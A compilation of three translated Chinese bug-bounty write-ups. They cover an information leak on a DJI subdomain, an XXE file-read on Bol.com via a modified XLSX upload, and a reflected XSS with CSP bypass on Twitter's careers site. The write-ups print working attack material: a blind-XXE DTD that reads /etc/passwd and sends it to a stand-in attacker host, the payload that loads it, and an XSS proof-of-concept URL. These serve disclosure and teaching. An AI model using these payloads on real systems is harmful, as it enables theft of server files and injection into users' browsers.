本文中，孟加拉国安全研究者Yeasir Arafat讲述了他对大疆无人机公司的一次漏洞测试，其通过漏洞利用，最终可获取到大疆公司包括用户IP在内的一些用户注册信息。漏洞虽小，也值得向我们这些小白分享学习，大神请绕路…..
前期踩点
一个月前，我知道大疆公司运行有漏洞赏金项目之后，我就在上面提交了几个漏洞，但最终评定结果好像都是N/A，这貌似是我不清楚他们的漏洞评定条件导致的。之后，我的一个朋友告诉我了大疆的一些具体的漏洞提交条件，我眼前一亮，哇，漏洞范围还挺广的，其中就包括大疆公司的主站*.dji.com。
首先，我就从大疆主站入手，但一无所获。但我也不气馁，过后一天，我用在线工具“dnsdumpster.com”对其域名进行了深入探测，效果还不错，发现了很多如下有意思的域名。由于保密策略，抱歉在此我不能透露我发现漏洞的具体域名。
有了这些域名，我就从大量*.dji.com中挑选了一个作为测试目标。在几个小时的折腾测试中，我还真发现了多个有效漏洞。测试开始，我就告诉自己要沉住气，要尝试深入挖掘一番。经过探测，我发现了该域名的一个子域名*.*.dji.com。
一开始，你会认为这只是一个有趣的域名，可能不会有太多发现成果。但刚好相反，仔细分析，我发现该子域名站点使用了亚马逊的“cloudfront”服务，并设置有保证网站安全的内容安全策略（CSP）。由于该域名存在一些.php页面和tid=1234类似的端点，我打算试试SQL注入，或看看是否能发现一些的数据库错误。
但遗憾的是，我总不能绕过网站的Modsecuirty策略，而且其mod= pamaeter 形式下也不存在任何SQL注入漏洞。以下为其Modsecuirty策略：
偶然发现
我也不死心，继续研究，继而发现了两个用户之间的消息发送端，为了防止CSRF攻击，该发送端设置了表单密钥保护。
我通过利用BurpSuite进行请求抓包，发现了这个消息发送端中存在一些琐碎的参数。我没对数据包实施更改或添加任何SQL注入命令，只是简单地点击“go”按钮发送请求，在响应栏中我发现，存在一些类似于![CDATA[]]的东西。
我当时也不知道这是什么东东，于是用“xml root cdata是什么”快速Google了一下才知道，#CDATA数据段表示不应由XML解析器解析的文本数据。
一会之后，我想到了在请求中加入了op=showmsg‘来看看有什么响应，非常偶然，响应以XML形式的root标签段页面返回了一些信息，如下图所示：
漏洞测试
通常来说，会为不同用户分配一个不同的“uid”参数，这种UID参数应用在不同服务中以阐明不同独特变量，这里的UID参数则用来声明userID信息。
我在想，如果我添加一个amp或XML root路径的do参数，再加上我自己的UID会是什么情况呢？于是，最终更改的路径是这样：
https://*.*.dji.com/mod.php;uid=1234&do=index&view=admin%27
%27相当于一个注入命令’，运行后，我能看到自己的注册和登录IP，而且，把消息发送端中涉及的另外一方账户UID替换掉我的UID之后，就能看到对方的注册和登录IP信息，另外，还能获取到对方的用户空间大小、信用值、积分等网站注册信息。注意：如果不加%27在上述链接之后，响应返回的是一个空白页面，但如果加了%27之后，才会返回包括IP和其它数据的XML信息页面。
最终，大疆公司的漏洞处理进程也相当快，我也获取了大疆方面奖励的漏洞赏金。
TIPs：
前期踩点识别工作一定要做充分，有助于后续的漏洞发现；
了解网站WEB应用的运行机制，通过其行为分析，可能会发现一些大漏洞；
尽可能地手工测试所有WEB服务端，光靠扫描器是深入挖掘不了太多有用信息的。
*参考来源：medium，FreeBuf小编clouds编译，来自FreeBuf.COM
更多资讯
◈ 向警方举报切尔西·曼宁的黑客阿德里安·拉莫去世 年仅37岁
http://t.cn/Rnbrtx9
◈ 梵蒂冈首届黑客马拉松活动成功举办
http://t.cn/RnbrtYg
◈ 微软将强迫用 Edge 浏览器打开 Mail 应用里的链接
http://t.cn/RnbrcPe
◈ 网贷备案行业众生相：200万成本压垮中小平台
http://t.cn/Rnbrcc3
（信息来源于网络，安华金和搜集整理）



                
  

研究一个新网站漏洞或攻击手段，依照以下思路去做好。

 

1.什么是XXX漏洞？这个网站漏洞的原理是啥？

 

2.为什么会产生这个漏洞被黑客攻击？最直接的原因是啥？

 

3.怎么发现这个漏洞？怎么去验证漏洞是否存在？怎么利用这个漏洞？

 

4.漏洞利用的首要条件是啥？漏洞危害的范围？漏洞导致的危害有多大？

 

5.如果在甲方公司出现漏洞问题，公司站点受到此攻击，我应该如何快速定位到问题进行修复防


止被入侵？

 

6.如何提前防范这个漏洞？如何做好加固？

 

所以过去读书的时候体育老师说的好，只需弄懂What、Why、How，语文考试轻易得高分。

背景

在之前的报告中，我们学到了许多有关在访问者的浏览器中执行代码的知识；反射型XSS和存储型XSS。此外，我们还快速查看了错误配置的服务器设置和Open Redirect（开放式重定向）。

今天，我们将探讨的是如何从服务器窃取私有文件。

选择目标

像往常一样，我们需要一个好的目标。Bol.com是荷兰最大的电子商务网站之一。他们对我提交的开放式重定向错误报告的处理非常积极；快速的回复，修复并始终向我发送更新。没有任何额外的麻烦，没有NDA保密协议，轻松愉快的语气。可以说这是其他公司处理负责任披露的完美范例。也是一家你 值得加入的公司。

在开始正式的内容前，让我们先来了解下什么是XXE，LFI和RCE。

本地文件包含（LFI）是在服务器响应中显示内部服务器文件的过程。远程执行代码（RCE）是在服务器上执行我们自己代码的过程。

通常LFI错误会导致RCE；有很多技巧可以用来将LFI升级为RCE。

RCE漏洞会对服务器安全带来巨大的威胁，因为它可能会最终导致完整的服务器接管。尽管大多数服务器在访问受限的帐户下执行来自Web服务器的代码，但操作系统本身仍时不时会存在一些缺陷。允许绕过此特定访问限制的缺陷。你可能在过去使用过这种类型的bug；通过在iPhone上越狱iOS或root你的安卓手机。两者都是利用了bug来接管操作系统。我们将此类攻击称为提权。

XML外部实体（XXE）攻击基于扩展XML文件，加载本地文件和外部URL。它可能会导致LFI和RCE，因此它同样具有很大的威胁性。虽然XXE攻击发现于十多年前，但至今你仍然可以在许多网站上发现这个漏洞。

可扩展标记语言（XML）

XML是一种标记语言，允许创建计算机和人都易于阅读的文档。虽然有人说这种语言已经过时，但直到现在仍有许多地方在使用它。



如果我们仔细查看该示例，会注意到contents在标记之间，例如<body>contents</body>。因此，我们应该转义标签内的特定字符。否则，将有可能被人恶意注入标签并操纵整个XML文件。默认情况下，XML会将<>&’”字符转义为类似&lt;&gt;&amp;&apos;&quot;的实体。因此，我们仍可以在不破坏XML文件的情况下使用字符。

XML有一个很好的功能，就是允许我们通过在XML文档中包含Document类型定义（DTD）来定义我们自己的实体。如下所示。



DTD 示例：

Example DTD
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY body "Don't forget me this weekend!" >
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body><r>&body;</r></body>
</note>

利用 XML 解析器



但是如果解析器允许我们定义文件而不是字符串呢？结果将是实体被文件中的内容替换。通过更改<!ENTITY body “Don’t forget me this weekend!” >为<!ENTITY body SYSTEM “file:///etc/passwd” >一些解析器将会向我们直接显示/etc/passwd文件的内容。

除了LFI，一些XML解析器还允许我们加载外部URL；只需用http://替换file://字符串即可。webserver将请求此URL。这可能会导致SSRF攻击；你也可以请求内部webserver，扫描开放端口并映射内部网络。你是否能够访问到包含元数据的本地webservers？如果是那么恭喜你，你最终可能得到 25000美元的漏洞赏金。

其他可能性是通过PHP模块直接获取RCE和拒绝服务攻击。

上述LFI攻击只有在我们的输入返回到某个地方时才可行。否则我们无法读取被替换的实体。如果遇到这种情况，可以使用以下技巧来泄漏数据。

盲XXE？通过HTTP/FTP请求外部DTD泄漏数据

所以服务器会解析你的XML，但没有向你显示响应中的内容？

由于你可以加载外部DTD，因此你可以将自定义实体附加到外部URL。只要URL有效，它就会加载附加了（文件）内容的URL。请注意像#这样的字符会破坏url。

XXEserve

XXEserve是一个由staaldraad创建的用于捕获XXE请求的一个非常棒的工具。它是一个简单的FTP/HTTP服务器，会显示所有我们对服务器的请求。它还伪造了一个FTP服务器；由于字符串中字符的原因，HTTP有时会失败，FTP则会保持正常工作。

快速开始

1.在公共服务器上安装XXEserv

2.创建包含要泄漏的文件或（内部）URL的外部DTD文件（即sp2.dtd）。将x.x.x.x替换为服务器的IP地址或主机名：

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY body SYSTEM 'ftp://x.x.x.x:21/%d;'>">

3.将此外部DTD文件放在XXEserv目录中。XXEserv充当公共ftp和Web服务器；所以我们现在能够链接这个文件。

4.将XML payload发送给受害者，包括我们的外部DTD：

<?xml version=”1.0" encoding=”UTF-8"?>
<!DOCTYPE r [
<!ENTITY % a SYSTEM "http://x.x.x.x:80/dtds/sp2.dtd">
%a;
%c;
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body><r>&body;</r></body>
</note>

5.观察XXEserv的输出



如果想查看不同变种的XXE payloads，请点击此处[1][2]。

我们需要找到一种方法将我们的XML代码上传或注入到Bol.com。我们可以从他们的“卖家门户”入手。大多数情况下，卖家能够上传与其产品相关的图片或其他文件。



网站的这一部分允许用户上传准备好（再次）销售的产品。



一句简短的荷兰语：’Aanbod beheren via excel’意思是“在excel中管理库存”。

此界面共包含有三个步骤：


1.下载包含当前库存的Excel文件

2.上传更改的Excel文件

3.查看上传结果


库存 Excel 文件

Excel文件的扩展名为XLSX。这是微软开发的一种开放文件格式；它是一个包含多个XML文件的zip文件。



让我们解压这个文件。



如果我们打开sheet1.xml，我们将看到以下代码。

假设我们想尝试将/etc/passwd的文件内容注入到Offer描述中（这是G4单元格，请参阅原始Excel工作表）。

正如我们在图中所看到的那样，字符串’Sample description’被id 108引用。让我们将自定义实体添加到该工作表中，并将此单元格值替换为我们的自定义实体。

我们保存文件，再次压缩文件夹并将文件重命名为xlsx。



让我们看看如果我们在步骤2中上传文件，让它加载，然后从步骤1再次下载文件会发生什么。如果XXE攻击有效，它将更新我们的示例产品（Excel中的第4行）并将/etc/passwd的文件内容注入到产品的标价说明当中。

POC



 

可以看到我们成功获取到了/etc/passwd中的内容。现在是时候撰写报告并通知他们了！

下一步是检查服务器是否是支持云元数据，检查包含API密钥的配置文件，并查看是否可以从LFI升级到RCE。

但由于该结果已对目标有足够的影响，因此我决定立即通知Bol.com。我询问他们是否需要我进一步的测试并将此升级为RCE。但在他们回复之前，错误已经被修复:-)

文件枚举

如果我们尝试解析目录而不是文件（即<!ENTITY body SYSTEM “file:///etc/”>），Bol.com使用的XML解析器将返回文件名（作为一个大字符串）。这使我们能够快速枚举服务器上的所有文件，而不需要爆破文件名。

大批量 XXE 注入

可以在大量文件中注入XXE payload。因此，每次上传图片都是潜在的XXE漏洞。Buffalo创建了一个很不错的工具，可帮助你将XXE payload轻松地嵌入到所有这些不同的文件中。

总结

通过编辑XML文件，我们能够在上传中将本地服务器文件的内容作为字符串包含在内。之后我们能够下载此文档，因此我们能够从其中一个生产服务器读取私有文件。

解决方案

最佳解决方案是禁用XML解析器中的任何DTD支持。更多内容请参阅OWASP对不同解析器及其配置的概述。

影响


- 本地文件包含

- 可能执行本地拒绝服务攻击（未确认）

- 可能的RCE（未确认）

- 可能的SSRF（未确认）


时间线


2018.9.2 发现漏洞并通知Bol.com

2018.9.3 Bol.com确认漏洞

2018.9.4 Bol.com修复漏洞，并奖励了价值500欧元的Bol.com优惠券

2018.9.8 撰写本文并告知Bol.com

2018.9.11 发表本文


*参考来源：medium，FB小编secist编译，转载请注明来自FreeBuf.COM



secist409 篇文章等级： 9级

|

|

上一篇：企业安全体系架构分析：开发安全架构之防CC攻击脚本编写
	
下一篇：本篇已是最新文章

我是一名安全研究人员，也是一名Bug Hunter，但我仍一直在学习。在这篇文章中，我不仅要告诉大家在这样一个如此热门且非常安全的大型网站中找到一个XSS漏洞是有多么的困难，而且我还会跟大家描述我是如何配合另一个CSP（内容安全策略）绕过漏洞并最终在Twitter.com的节点中找到了一个XSS漏洞。 

此前，也有人发现了Twitter任意账户发送推文漏洞，但Twitter的漏洞总体来说较少且较难挖掘。
漏洞的发现过程
在对Twitter的子域名进行了一番研究之后，我发现了节点https://careers.twitter.com/。你估计已经猜到了，这是Twitter的求职网站，你可以在这里寻找自己在Twitter的工作机会，不过我来这里是为了寻找安全漏洞的。
研究了片刻之后，我发现我似乎找到了一个反射型XSS漏洞。URL如下（注意其中的location参数）：
https://careers.twitter.com/en/jobs-search.html?location=1"onmouseover=”alert(1)&q=1&start=70&team=


但是请等一下，这里竟然没有弹出对话框！我竟然没能触发对话弹窗？原来，Twitter采用了如下的内容安全策略（CSP）：
content-security-policy: default-src‘self’ ; connect-src ‘self’ ; font-src ‘self’ https://*.twimg.comhttps://*.twitter.com data:; frame-src ‘self’ https://twitter.comhttps://*.twitter.com [REDACTED] https://*.twitter.com; report-uri https://twitter.com/i/csp_report

原来，Twitter所采用的CSP禁止了网站弹出JavaScript警告窗口，所以很不幸我无法通过这样的方式来利用这个反射性XSS漏洞。于是跟往常一样，我跑去请教我的老师@brutelogic。我跟他说，我找到了一个XSS漏洞（没提具体细节和域名），但由于网站采用了CSP导致我无法利用这个XSS漏洞。而老师给我的建议就是想办法绕过CSP！他的原话是:”我的天啊，我不想听你说话了，你赶紧想办法绕过这该死的CSP！”好吧…谢谢老师！
在接下来的时间里，我尝试了很多种方法，也尝试寻找了一些其他的子域名，最终我发现了一个带有隐藏GET请求的URL节点：
https://analytics.twitter.com/tpm?tpm_cb=
响应信息的Content-Type为 application/javascript，而我在这里写的参数tpm_cb被反射到了页面上！


这一次我就很幸运了，我结合我所发现的东西最终成功地利用了这个XSS漏洞。我设计的PoC代码如下：
https://careers.twitter.com/en/jobs-search.html?location=1"><scriptsrc=//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>//
果然不出我所料，终于成功了！


总结
虽然过程比较艰辛，但结果总归是好的。
于是我立刻通过Twitter在HackerOne上的漏洞奖励计划将该问题报告给了Twitter，而Twitter的安全专家很快对我上报的漏洞进行了评估和分类，并迅速给我提供了漏洞奖金。值得一提的是，Twitter很快便修复了其求职网站中的XSS漏洞，但这个CSP绕过漏洞却花了很久时间才解决。不过无论怎样，这些漏洞最终都已经得到了修复。感谢Twitter的安全团队以及超赞的HackerOne社区！
希望这篇文章中的内容可以给那些像我一样的新手带来帮助，如果你也想分享自己的挖洞经验，你可以在Twitter上艾特我@tbmnull。
* 参考来源：medium， FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM




Alpha_h4ck
226 篇文章 等级： 
8级 



|


| 



上一篇：【更新360公司回应】火球（Fireball）病毒，是老外如临大敌，还是360指鹿为马？
下一篇： 
Google正在测试“恐慌按钮”：Android用户只需狂按返回键可“秒关”可疑恶意程序 


这些评论亮了



漏洞审核 回复
反射型XSS，忽略。
)19(
亮了

发表评论
已有 5 条评论 




漏洞审核  2017-07-12
回复
1楼

反射型XSS，忽略。

亮了(19)







匿名懦夫  2017-07-13
回复
2楼

alpha_h4ck体:我是如何在xxx上找到漏洞的

我是如何拿到xxx大奖的

亮了(0)







漏洞审核  2017-07-13
回复
3楼

反射xss，忽略

亮了(0)








bi3g0 
(1级)
 2017-07-13 回复
4楼

不过讲道理 国外有漏洞奖励计划的站 反射性xss都不好找

亮了(0)







路人申  2017-07-13
回复
5楼

标题竟然不是“我是如何找到XXX漏洞，获得XXX美金奖励”